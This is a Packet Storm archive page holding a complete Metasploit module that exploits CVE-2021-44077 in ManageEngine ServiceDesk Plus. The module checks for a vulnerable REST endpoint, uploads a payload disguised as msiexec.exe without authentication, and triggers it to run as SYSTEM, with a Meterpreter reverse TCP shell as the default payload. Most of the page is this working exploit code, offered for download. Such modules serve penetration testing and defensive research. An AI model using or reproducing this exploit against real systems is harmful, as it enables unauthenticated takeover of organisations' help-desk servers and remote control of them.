exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ManageEngine ServiceDesk Plus Remote Code Execution

ManageEngine ServiceDesk Plus Remote Code Execution
Posted Dec 28, 2021
Authored by wvu, Y4er | Site metasploit.com

This Metasploit module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build.

tags | exploit, remote, code execution, file upload
advisories | CVE-2021-44077
SHA-256 | 244ae2538bc9ec8f90e308561999a95ddf997764203cb31dbd2e32b039b73273

ManageEngine ServiceDesk Plus Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

Rank = ExcellentRanking

prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::EXE

def initialize(info = {})
super(
update_info(
info,
'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
'Description' => %q{
This module exploits CVE-2021-44077, an unauthenticated remote code
execution vulnerability in ManageEngine ServiceDesk Plus, to upload an
EXE (msiexec.exe) and execute it as the SYSTEM account.

Note that build 11305 is vulnerable to the authentication bypass but
not the file upload. The module will check for an exploitable build.
},
'Author' => [
# Discovered by unknown threat actors
'wvu', # Analysis and exploit
'Y4er' # Additional confirmation
],
'References' => [
['CVE', '2021-44077'],
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
],
'DisclosureDate' => '2021-09-16',
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => [ARCH_X86, ARCH_X64],
'Privileged' => true,
'Targets' => [
['Windows Dropper', {}]
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 8080,
'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)

register_options([
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end

def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')
)

unless res
return CheckCode::Unknown('Target failed to respond to check.')
end

# NOTE: /RestAPI/ImportTechnicians was removed after build 11303
unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')
return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')
end

CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
end

def exploit
upload_msiexec
execute_msiexec
end

def upload_msiexec
print_status('Uploading msiexec.exe')

form = Rex::MIME::Message.new
form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')
form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',
'form-data; name="theFile"; filename="msiexec.exe"')

res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),
'ctype' => "multipart/form-data; boundary=#{form.bound}",
'data' => form.to_s
)

unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')
fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')
end

print_good('Successfully uploaded msiexec.exe')
end

def execute_msiexec
print_status('Executing msiexec.exe')

# This endpoint "won't" return
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),
'vars_post' => {
'execute' => 's247AgentInstallationProcess'
}
}, 0)
end

# XXX: FileDropper dies a miserable death if the file is in use
def on_new_session(_session)
super

# Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7
print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close